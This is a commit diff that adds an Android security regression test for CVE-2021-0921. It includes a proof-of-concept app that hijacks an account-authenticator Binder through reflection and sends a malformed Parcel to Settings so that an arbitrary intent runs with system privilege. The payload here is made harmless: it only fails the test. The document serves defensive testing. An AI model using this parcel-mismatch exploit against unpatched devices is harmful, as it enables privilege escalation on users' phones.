diff options
author | Miroslaw Niemiec <mniemiec@google.com> | 2021-09-22 17:03:58 +0000 |
---|---|---|
committer | Miroslaw Niemiec <mniemiec@google.com> | 2021-10-07 23:49:27 +0000 |
commit | 8b3f52fe3965e35f14c1d1d071faf71e1dd39f08 (patch) | |
tree | 60f29ea0970a72e5b71c43bf8e11afd04bbf9d32 | |
parent | 1ac06aad84bd85218d9a41e6df50ece65b621ec8 (diff) | |
download | cts-8b3f52fe3965e35f14c1d1d071faf71e1dd39f08.tar.gz |
STS test for Android Security CVE-2021-0921
Test: sts-tradefed run sts-engbuild-no-spl-lock -m CtsSecurityBulletinHostTestCases -t android.security.cts.CVE_2021_0921
Bug: 199779591
Bug: 195962697
Change-Id: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3
Merged-In: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3
14 files changed, 741 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java new file mode 100644 index 00000000000..27900e19fcb --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java @@ -0,0 +1,68 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.AppModeFull; +import android.util.Log; +import android.platform.test.annotations.AsbSecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test; +import com.android.tradefed.log.LogUtil.CLog; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import static org.junit.Assert.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0921 extends BaseHostJUnit4Test { + private static final String TEST_PKG = "android.security.cts.CVE_2021_0921"; + private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest"; + private static final String TEST_APP = "CVE-2021-0921.apk"; + + @Before + public void setUp() throws Exception { + uninstallPackage(getDevice(), TEST_PKG); + } + + @Test + @AsbSecurityTest(cveBugId = 195962697) + @AppModeFull + public void testRunDeviceTest() throws Exception { + + CLog.i("testRunDeviceTest() start"); + installPackage(); + + //ensure the screen is woken up. + //KEYCODE_WAKEUP wakes up the screen + //KEYCODE_MENU called twice unlocks the screen (if locked) + getDevice().executeShellCommand("input keyevent KEYCODE_WAKEUP"); + getDevice().executeShellCommand("input keyevent KEYCODE_MENU"); + getDevice().executeShellCommand("input keyevent KEYCODE_HOME"); + getDevice().executeShellCommand("input keyevent KEYCODE_MENU"); + + //run the test + Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "test")); + CLog.i("testRunDeviceTest() end"); + } + + private void installPackage() throws Exception { + installPackage(TEST_APP, new String[0]); + } +} + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk new file mode 100644 index 00000000000..57296eb1390 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk @@ -0,0 +1,36 @@ +# Copyright (C) 2021 The Android Open Source Project +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +LOCAL_PATH := $(call my-dir) +include $(CLEAR_VARS) + +LOCAL_PACKAGE_NAME := CVE-2021-0921 +LOCAL_SRC_FILES := $(call all-java-files-under, src) +LOCAL_MODULE_TAGS := tests +LOCAL_SDK_VERSION := current +LOCAL_STATIC_JAVA_LIBRARIES := androidx.test.core +LOCAL_STATIC_JAVA_LIBRARIES += androidx.test.rules +LOCAL_STATIC_JAVA_LIBRARIES += ub-uiautomator + +# Tag this module as a cts test artifact +LOCAL_COMPATIBILITY_SUITE := cts vts sts + +LOCAL_PROGUARD_ENABLED := disabled +LOCAL_DEX_PREOPT := false +include $(BUILD_CTS_SUPPORT_PACKAGE) + + + + + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml new file mode 100644 index 00000000000..2e81b866e48 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml @@ -0,0 +1,57 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + --> + +<manifest xmlns:android="http://schemas.android.com/apk/res/android" + xmlns:tools="http://schemas.android.com/tools" + package="android.security.cts.CVE_2021_0921" + android:targetSandboxVersion="2"> + + <application> + <uses-library android:name="android.test.runner"/> + + <activity android:name=".AuthenticatorActivity" android:exported="true"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name=".TestActivity" android:exported="true"> + <intent-filter> + <action android:name="android.intent.action.RUN"/> + <category android:name="android.intent.category.DEFAULT"/> + </intent-filter> + </activity> + + <service + android:name=".AuthenticatorService" + android:enabled="true" + android:exported="true"> + <intent-filter> + <action android:name="android.accounts.AccountAuthenticator" /> + </intent-filter> + + <meta-data + android:name="android.accounts.AccountAuthenticator" + android:resource="@xml/authenticator" /> + </service> + </application> + + <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner" + android:targetPackage="android.security.cts.CVE_2021_0921" /> + +</manifest> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml new file mode 100644 index 00000000000..09d024c301f --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml @@ -0,0 +1,26 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + Copyright 2021 The Android Open Source Project + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + --> + +<LinearLayout + xmlns:android="http://schemas.android.com/apk/res/android" + android:layout_width="match_parent" + android:layout_height="match_parent"> + <TextView + android:layout_width="match_parent" + android:layout_height="match_parent" + android:text="CVE-2021-0921"/> +</LinearLayout> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml new file mode 100644 index 00000000000..69b22338c65 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<resources> + <color name="colorPrimary">#008577</color> + <color name="colorPrimaryDark">#00574B</color> + <color name="colorAccent">#D81B60</color> +</resources> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml new file mode 100644 index 00000000000..1a689a5305b --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml @@ -0,0 +1,3 @@ +<resources> + <string name="app_name">AnyIntentPoc</string> +</resources> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml new file mode 100644 index 00000000000..46194d5022f --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml @@ -0,0 +1,5 @@ +<?xml version="1.0" encoding="utf-8"?> +<account-authenticator + xmlns:android="http://schemas.android.com/apk/res/android" + android:accountType="android.security.cts" + android:label="@string/app_name"/> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java new file mode 100644 index 00000000000..4d4ad986f2b --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java @@ -0,0 +1,157 @@ +package android.security.cts.CVE_2021_0921; + +import android.accounts.AbstractAccountAuthenticator; +import android.accounts.Account; +import android.accounts.AccountAuthenticatorResponse; +import android.annotation.SuppressLint; +import android.content.Context; +import android.content.Intent; +import android.os.Bundle; +import android.os.IBinder; +import android.os.IInterface; +import android.os.Parcel; +import android.os.RemoteException; +import android.util.Log; + +import java.io.FileDescriptor; +import java.lang.reflect.Field; + +public class Authenticator extends AbstractAccountAuthenticator { + public static Intent mIntent; + private int TRANSACTION_onResult; + private IBinder mOriginRemote; + private static final String TAG = "TAG_2021_0921.Authenticator"; + private IBinder mProxyRemote = new IBinder() { + @Override + public String getInterfaceDescriptor() throws RemoteException { + return null; + } + + @Override + public boolean pingBinder() { + return false; + } + + @Override + public boolean isBinderAlive() { + return false; + } + + @Override + public IInterface queryLocalInterface(String descriptor) { + return null; + } + + @Override + public void dump(FileDescriptor fd, String[] args) throws RemoteException { + } + + @Override + public void dumpAsync(FileDescriptor fd, String[] args) throws RemoteException { + } + + @Override + public boolean transact(int code, Parcel data, Parcel reply, int flags) throws RemoteException { + Log.d(TAG, "transact() start"); + if (code == TRANSACTION_onResult) { + Log.d(TAG, "transact() before parse"); + data.recycle(); + data = GenMalformedParcel.parsingPackageImplParcel(mIntent); + Log.d(TAG, "transact() end parse"); + } + Log.d(TAG, "transact() continue"); + mOriginRemote.transact(code, data, reply, flags); + Log.d(TAG, "transact() end"); + return true; + } + + @Override + public void linkToDeath(DeathRecipient recipient, int flags) throws RemoteException { + } + + @Override + public boolean unlinkToDeath(DeathRecipient recipient, int flags) { + return false; + } + }; + + public Authenticator(Context context) { + super(context); + Log.d(TAG, "Authenticator() constructor"); + } + + @Override + public String getAuthTokenLabel(String authTokenType) { + return null; + } + + @Override + public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) { + return null; + } + + @Override + public Bundle getAuthToken(AccountAuthenticatorResponse response, Account account, + String authTokenType, Bundle options) { + return null; + } + + @Override + public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, + String authTokenType, String[] requiredFeatures, Bundle options) { + + Log.d(TAG, "addAccount() start"); + try { + Class AccountAuthenticatorResponseClass = Class.forName("android.accounts.AccountAuthenticatorResponse"); + @SuppressLint("SoonBlockedPrivateApi") + Field mAccountAuthenticatorResponseField = AccountAuthenticatorResponseClass.getDeclaredField("mAccountAuthenticatorResponse"); + mAccountAuthenticatorResponseField.setAccessible(true); + Object mAccountAuthenticatorResponse = mAccountAuthenticatorResponseField.get(response); + + Class stubClass = null; + for (Class inner : Class.forName("android.accounts.IAccountAuthenticatorResponse").getDeclaredClasses()) { + if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub")) { + stubClass = inner; + break; + } + } + + Field TRANSACTION_onResultField = stubClass.getDeclaredField("TRANSACTION_onResult"); + TRANSACTION_onResultField.setAccessible(true); + TRANSACTION_onResult = TRANSACTION_onResultField.getInt(null); + + Class proxyClass = null; + for (Class inner : stubClass.getDeclaredClasses()) { + if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub.Proxy")) { + proxyClass = inner; + break; + } + } + + Field mRemoteField = proxyClass.getDeclaredField("mRemote"); + mRemoteField.setAccessible(true); + mOriginRemote = (IBinder) mRemoteField.get(mAccountAuthenticatorResponse); + mRemoteField.set(mAccountAuthenticatorResponse, mProxyRemote); + } catch (Exception e) { + e.printStackTrace(); + } + Log.d(TAG, "addAccount() end"); + + return new Bundle(); + } + + @Override + public Bundle confirmCredentials(AccountAuthenticatorResponse response, Account account, Bundle options) { + return null; + } + + @Override + public Bundle updateCredentials(AccountAuthenticatorResponse response, Account account, String authTokenType, Bundle options) { + return null; + } + + @Override + public Bundle hasFeatures(AccountAuthenticatorResponse response, Account account, String[] features) { + return null; + } +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java new file mode 100644 index 00000000000..41e30eb5ca0 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java @@ -0,0 +1,31 @@ +package android.security.cts.CVE_2021_0921; + +import android.content.Context; +import android.app.Activity; +import android.os.Build; +import android.os.Bundle; +import android.util.Log; + +public class AuthenticatorActivity extends Activity { + + private static final String TAG = "TAG_2021_0921.AuthenticatorActivity"; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + Log.d(TAG, "onCreate() start"); + setContentView(R.layout.activity_main); + new Trigger(AuthenticatorActivity.this).accountSettings(); + Log.d(TAG, "onCreate() end"); + } + + @Override + protected void onResume() { + super.onResume(); + this.finish(); + } +} + + + + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java new file mode 100644 index 00000000000..917056239bb --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java @@ -0,0 +1,15 @@ +package android.security.cts.CVE_2021_0921; + +import android.app.Service; +import android.content.Intent; +import android.os.IBinder; + +public class AuthenticatorService extends Service { + public AuthenticatorService() { + } + + @Override + public IBinder onBind(Intent intent) { + return new Authenticator(this).getIBinder(); + } +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java new file mode 100644 index 00000000000..51733ef15cf --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java @@ -0,0 +1,63 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0921; + +import org.junit.Test; +import org.junit.runner.RunWith; + +import android.content.Context; +import android.content.Intent; +import android.content.pm.PackageManager; +import android.os.SystemClock; +import android.util.Log; +import android.support.test.uiautomator.UiDevice; +import androidx.test.runner.AndroidJUnit4; + +import static androidx.test.core.app.ApplicationProvider.getApplicationContext; +import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation; +import static org.junit.Assert.assertFalse; + +@RunWith(AndroidJUnit4.class) +public class DeviceTest { + + private static final String TAG = "TAG_2021_0921.DeviceTest"; + private UiDevice mDevice; + + @Test + public void test() { + Log.d(TAG, "test() start"); + + //set mDevice and go to homescreen + mDevice = UiDevice.getInstance(getInstrumentation()); + mDevice.pressHome(); + Context context = getApplicationContext(); + String TEST_PACKAGE = "android.security.cts.CVE_2021_0921"; + PackageManager packageManager = context.getPackageManager(); + + //start poc app + Intent intent = packageManager.getLaunchIntentForPackage(TEST_PACKAGE); + intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK); + intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + context.startActivity(intent); + + //wait for poc app to complete (it takes about 6 seconds) + SystemClock.sleep(20000); + + Log.d(TAG, "test() end"); + } +} + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java new file mode 100644 index 00000000000..ff0bb62e928 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java @@ -0,0 +1,210 @@ +package android.security.cts.CVE_2021_0921; + +import android.accounts.AccountManager; +import android.content.Intent; +import android.os.Binder; +import android.os.Bundle; +import android.os.Parcel; +import android.util.Log; + +public class GenMalformedParcel { + + private static final String TAG = "TAG_2021_0921.GenMalformedParcel"; + + public static Parcel parsingPackageImplParcel(Intent intent) { + Log.d(TAG, "parsingPackageImplParcel() start"); + + Parcel data = Parcel.obtain(); + data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse"); + data.writeInt(1); + int bundleLenPos = data.dataPosition(); + data.writeInt(0); + data.writeInt(0x4C444E42); + int bundleStartPos = data.dataPosition(); + data.writeInt(3); + + data.writeString("key1"); + data.writeInt(4); + data.writeString("android.content.pm.parsing.ParsingPackageImpl"); + + data.writeInt(0); // supportsSmallScreens + data.writeInt(0); // supportsNormalScreens + data.writeInt(0); // supportsLargeScreens + data.writeInt(0); // supportsExtraLargeScreens + data.writeInt(0); // resizeable + data.writeInt(0); // anyDensity + data.writeInt(0); // versionCode + data.writeInt(0); // versionCodeMajor + data.writeInt(0); // baseRevisionCode + data.writeString("versionName"); // versionName + data.writeInt(0); // compileSdkVersion + data.writeString("compileSdkVersionCodeName"); // compileSdkVersionCodeName + data.writeString("packageName"); // packageName + data.writeString("realPackage"); // realPackage + data.writeString("baseCodePath"); // baseCodePath + data.writeInt(false ? 1 : 0); // requiredForAllUsers + data.writeString("restrictedAccountType"); // restrictedAccountType + data.writeString("requiredAccountType"); // requiredAccountType + data.writeString("overlayTarget"); // overlayTarget + data.writeString("overlayTargetName"); // overlayTargetName + data.writeString("overlayCategory"); // overlayCategory + data.writeInt(0); // overlayPriority + data.writeInt(false ? 1 : 0); // overlayIsStatic + data.writeInt(0); // overlayables + data.writeString("staticSharedLibName"); // staticSharedLibName + data.writeLong(0); // staticSharedLibVersion + data.writeInt(0); // libraryNames + data.writeInt(0); // usesLibraries + data.writeInt(0); // usesOptionalLibraries + data.writeInt(0); // usesStaticLibraries + data.writeInt(0); // usesStaticLibrariesVersions + data.writeInt(0); // digestsSize + data.writeString("sharedUserId"); // sharedUserId + data.writeInt(0); // sharedUserLabel + data.writeInt(0); // configPreferences + data.writeInt(0); // reqFeatures + data.writeInt(0); // featureGroups + data.writeInt(0); // restrictUpdateHash + data.writeInt(0); // originalPackages + data.writeInt(0); // adoptPermissions + data.writeInt(0); // requestedPermissions + data.writeInt(0); // implicitPermissions + data.writeInt(0); // upgradeKeySets + data.writeInt(0); // keySetMapping + data.writeInt(0); // protectedBroadcasts + data.writeInt(0); // activities + data.writeInt(0); // receivers + data.writeInt(0); // services + data.writeInt(0); // providers + data.writeInt(0); // attributions + data.writeInt(0); // permissions + data.writeInt(0); // permissionGroups + data.writeInt(0); // instrumentations + data.writeInt(0); // preferredActivityFilters + data.writeInt(0); // processes + data.writeInt(0); // metaData + data.writeString("volumeUuid"); // volumeUuid + data.writeInt(-1); // signingDetails + data.writeString("codePath"); // codePath + data.writeInt(false ? 1 : 0); // use32BitAbi + data.writeInt(false ? 1 : 0); // visibleToInstantApps + data.writeInt(false ? 1 : 0); // forceQueryable + + data.writeInt(1); // queriesIntents + data.writeInt(0); // queriesIntents + + data.writeInt(0); // queriesPackages + data.writeInt(0); // queriesProviders + data.writeString(""); // appComponentFactory + data.writeString(""); // backupAgentName + data.writeInt(-1); // banner + data.writeInt(0); // category + data.writeString(""); // classLoaderName + data.writeString("className"); // className + data.writeInt(-1); // compatibleWidthLimitDp + data.writeInt(0); // descriptionRes + data.writeInt(false ? 1 : 0); // enabled + data.writeInt(false ? 1 : 0); // crossProfile + data.writeInt(0); // fullBackupContent + data.writeInt(0); // iconRes + data.writeInt(0); // installLocation + + data.writeInt(0); // labelRes -> queriesPackages + data.writeInt(0); // largestWidthLimitDp -> queriesProviders + data.writeInt(-1); // logo -> appComponentFactory + data.writeString("manageSpaceActivityName"); // manageSpaceActivityName -> backupAgentName + data.writeFloat(0); // maxAspectRatio -> banner + data.writeFloat(0); // minAspectRatio -> category + data.writeInt(-1); // minSdkVersion -> classLoaderName + data.writeInt(-1); // networkSecurityConfigRes -> className + data.writeInt(1); // nonLocalizedLabel -> compatibleWidthLimitDp + data.writeInt(-1); // nonLocalizedLabel -> descriptionRes + data.writeInt(-1); // permission -> enabled + data.writeInt(-1); // processName -> crossProfile + data.writeInt(0); // requiresSmallestWidthDp -> fullBackupContent + data.writeInt(0); // roundIconRes -> iconRes + data.writeInt(0); // targetSandboxVersion -> installLocation + data.writeInt(0); // targetSdkVersion -> labelRes + data.writeInt(-1); // taskAffinity -> largestWidthLimitDp + data.writeInt(0); // theme -> logo + data.writeInt(-1); // uiOptions -> manageSpaceActivityName + data.writeInt(-1); // zygotePreloadName -> maxAspectRatio + data.writeInt(0); // splitClassLoaderNames -> minAspectRatio + data.writeInt(0); // splitCodePaths -> minSdkVersion + data.writeInt(0); // splitDependencies -> networkSecurityConfigRes + data.writeInt(0); // splitFlags -> nonLocalizedLabel + data.writeInt(-1); // splitNames -> nonLocalizedLabel + data.writeInt(-1); // splitRevisionCodes -> permission + data.writeInt(false ? 1 : 0); // externalStorage -> processName + data.writeInt(false ? 1 : 0); // baseHardwareAccelerated -> processName + data.writeInt(true ? 1 : 0); // allowBackup -> requiresSmallestWidthDp + data.writeInt(false ? 1 : 0); // killAfterRestore -> roundIconRes + data.writeInt(false ? 1 : 0); // restoreAnyVersion -> targetSandboxVersion + data.writeInt(false ? 1 : 0); // fullBackupOnly -> targetSdkVersion + data.writeInt(false ? 1 : 0); // persistent -> taskAffinity + data.writeInt(false ? 1 : 0); // debuggable -> taskAffinity + data.writeInt(false ? 1 : 0); // vmSafeMode -> theme + data.writeInt(false ? 1 : 0); // hasCode -> uiOptions + data.writeInt(false ? 1 : 0); // allowTaskReparenting -> zygotePreloadName + data.writeInt(false ? 1 : 0); // allowClearUserData -> zygotePreloadName + data.writeInt(false ? 1 : 0); // largeHeap -> splitClassLoaderNames + data.writeInt(false ? 1 : 0); // usesCleartextTraffic -> splitCodePaths + data.writeInt(false ? 1 : 0); // supportsRtl -> splitDependencies + data.writeInt(false ? 1 : 0); // testOnly -> splitFlags + data.writeInt(false ? 1 : 0); // multiArch -> splitNames + data.writeInt(false ? 1 : 0); // extractNativeLibs -> splitRevisionCodes + data.writeInt(false ? 1 : 0); // game -> externalStorage + data.writeInt(false ? 1 : 0); // resizeableActivity -> baseHardwareAccelerated + data.writeInt(false ? 1 : 0); // staticSharedLibrary -> allowBackup + data.writeInt(false ? 1 : 0); // overlay -> killAfterRestore + data.writeInt(false ? 1 : 0); // isolatedSplitLoading -> restoreAnyVersion + data.writeInt(false ? 1 : 0); // hasDomainUrls -> fullBackupOnly + data.writeInt(false ? 1 : 0); // profileableByShell -> persistent + data.writeInt(false ? 1 : 0); // backupInForeground -> debuggable + data.writeInt(false ? 1 : 0); // useEmbeddedDex -> vmSafeMode + data.writeInt(false ? 1 : 0); // defaultToDeviceProtectedStorage -> hasCode + data.writeInt(false ? 1 : 0); // directBootAware -> allowTaskReparenting + data.writeInt(false ? 1 : 0); // partiallyDirectBootAware -> allowClearUserData + data.writeInt(false ? 1 : 0); // resizeableActivityViaSdkVersion -> largeHeap + data.writeInt(false ? 1 : 0); // allowClearUserDataOnFailedRestore -> usesCleartextTraffic + data.writeInt(false ? 1 : 0); // allowAudioPlaybackCapture -> supportsRtl + data.writeInt(false ? 1 : 0); // requestLegacyExternalStorage -> testOnly + data.writeInt(false ? 1 : 0); // usesNonSdkApi -> multiArch + data.writeInt(false ? 1 : 0); // hasFragileUserData -> extractNativeLibs + data.writeInt(false ? 1 : 0); // cantSaveState -> game + data.writeInt(false ? 1 : 0); // allowNativeHeapPointerTagging -> resizeableActivity + data.writeInt(0); // autoRevokePermissions -> staticSharedLibrary + data.writeInt(false ? 1 : 0); // preserveLegacyExternalStorage -> overlay + data.writeInt(0); // mimeGroups -> isolatedSplitLoading + data.writeInt(0); // gwpAsanMode -> hasDomainUrls + data.writeInt(0); // minExtensionVersions -> profileableByShell + + data.writeString("key2"); + data.writeInt(-1); + + data.writeString("key3"); + data.writeInt(13); + int byteArrayLenPos = data.dataPosition(); + data.writeInt(0); + int byteArrayStartPos = data.dataPosition(); + for (int i = 0; i < 7; i++) { + data.writeInt(0); + } + data.writeString(AccountManager.KEY_INTENT); + data.writeInt(4); + data.writeString("android.content.Intent"); + intent.writeToParcel(data, 0); + int byteArrayEndPos = data.dataPosition(); + data.setDataPosition(byteArrayLenPos); + int byteArrayLen = byteArrayEndPos - byteArrayStartPos; + data.writeInt(byteArrayLen); + data.setDataPosition(byteArrayEndPos); + int bundleEndPos = data.dataPosition(); + data.setDataPosition(bundleLenPos); + int bundleLen = bundleEndPos - bundleStartPos; + data.writeInt(bundleLen); + data.setDataPosition(bundleEndPos); + Log.d(TAG, "parsingPackageImplParcel() end"); + return data; + } +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java new file mode 100644 index 00000000000..5fe3acfc869 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java @@ -0,0 +1,23 @@ +package android.security.cts.CVE_2021_0921; + +import android.content.Context; +import android.app.Activity; + +import android.os.Bundle; +import android.util.Log; +import org.junit.Assert; + +public class TestActivity extends Activity { + private static final String TAG = "TAG_2021_0921.TestActivity"; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + Log.d(TAG, "onCreate() start"); + Assert.fail("Arbitrary intent executed. Device is vulnerable."); + } +} + + + + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java new file mode 100644 index 00000000000..987b161766f --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java @@ -0,0 +1,41 @@ +package android.security.cts.CVE_2021_0921; + +import android.content.ComponentName; +import android.content.Context; +import android.content.Intent; +import android.content.pm.ApplicationInfo; +import android.net.Uri; +import android.util.Log; + +import java.io.File; + +public class Trigger { + private static final String TAG = "TAG_2021_0921.Triggger"; + private Context mContext; + + public Trigger(Context context) { + mContext = context; + } + + public void accountSettings() { + Log.d(TAG, "accountSettings() start"); + + //replaces intent.setAction(Intent.ACTION_REBOOT) in original Poc + Intent arbitraryIntent = new Intent(mContext, TestActivity.class); + + //Patched device is not supposed to process that intent + Authenticator.mIntent = arbitraryIntent; + + Intent intent = new Intent(); + intent.setComponent(new ComponentName( + "com.android.settings", + "com.android.settings.accounts.AddAccountSettings")); + intent.setAction(Intent.ACTION_RUN); + intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + String authTypes[] = {"android.security.cts"}; + + intent.putExtra("account_types", authTypes); + mContext.startActivity(intent); + Log.d(TAG, "accountSettings() end"); + } +} |